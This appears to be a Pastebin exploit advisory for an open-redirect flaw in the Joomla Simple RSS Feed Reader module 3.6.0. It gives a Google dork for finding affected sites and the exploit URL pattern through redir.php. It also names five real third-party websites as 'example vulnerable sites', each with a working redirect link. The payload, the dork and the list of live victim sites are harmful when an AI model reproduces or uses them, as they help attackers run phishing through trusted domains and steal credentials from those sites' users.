Advertisement
KingSkrupellos

Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Redirection

Jan 14th, 2019
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.57 KB | None | 0 0
  1. ###########################################################################
  2.  
  3. # Exploit Title : Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Modules Open Redirect
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/01/2019
  7. # Vendor Homepage : joomlaworks.net
  8. # Software Download Links :
  9. joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
  10. joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
  11. # Software Information Links :
  12. + extensions.joomla.org/extension/simple-rss-feed-reader/
  13. + joomlaworks.net/extensions/free/simple-rss-feed-reader
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Version Information : 3.6.0
  17. # Exploit Risk : Medium
  18. # Google Dorks : inurl:"/modules/mod_jw_srfr/"
  19. # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
  20.  
  21. ###########################################################################
  22.  
  23. # Impact :
  24. *********
  25.  
  26. * This web application called as Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0
  27.  
  28. accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
  29.  
  30. This simplifies phishing attacks.
  31.  
  32. * An http parameter may contain a URL value and could cause the web application to redirect
  33.  
  34. the request to the specified URL. By modifying the URL value to a malicious site, an attacker may
  35.  
  36. successfully launch a phishing scam and steal user credentials. Because the server name in the
  37.  
  38. modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
  39.  
  40. ###########################################################################
  41.  
  42. # Exploit :
  43. ***********
  44.  
  45. /modules/mod_jw_srfr/redir.php?url=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]
  46.  
  47. ###########################################################################
  48.  
  49. # Example Vulnerable Sites :
  50. *************************
  51.  
  52. [+] owyyk.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/ =>
  53.  
  54. [ Proof of Concept for Open Redirect ] => archive.is/rWOQy
  55.  
  56. [+] rosemarytv.com/modules/mod_jw_srfr/redir.php?url=https://packetstormsecurity.com
  57.  
  58. [+] lyngs.dk/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
  59.  
  60. [+] coachingathleticsq.com/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
  61.  
  62. [+] indonesianmma.com/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
  63.  
  64. ###########################################################################
  65.  
  66. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  67.  
  68. ###########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement